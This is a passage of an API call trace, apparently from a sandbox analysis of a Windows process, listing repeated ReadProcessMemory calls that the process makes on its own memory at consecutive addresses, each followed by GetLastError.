lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400160, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400161, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400162, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400163, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400164, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400165, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400166, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400167, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400168, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400169, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400170, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400171, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400172, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400173, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.297] GetLastError () returned 0x0 [0319.297] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400174, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400175, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400176, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400177, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400178, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400179, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400180, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400181, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400182, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400183, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400184, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400185, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400186, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400187, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400188, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400189, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.298] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.298] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400190, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400191, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400192, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400193, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400194, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400195, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400196, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400197, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400198, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400199, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.299] GetLastError () returned 0x0 [0319.299] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001aa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ab, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ac, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ad, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ae, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001af, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.300] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ba, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.300] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: 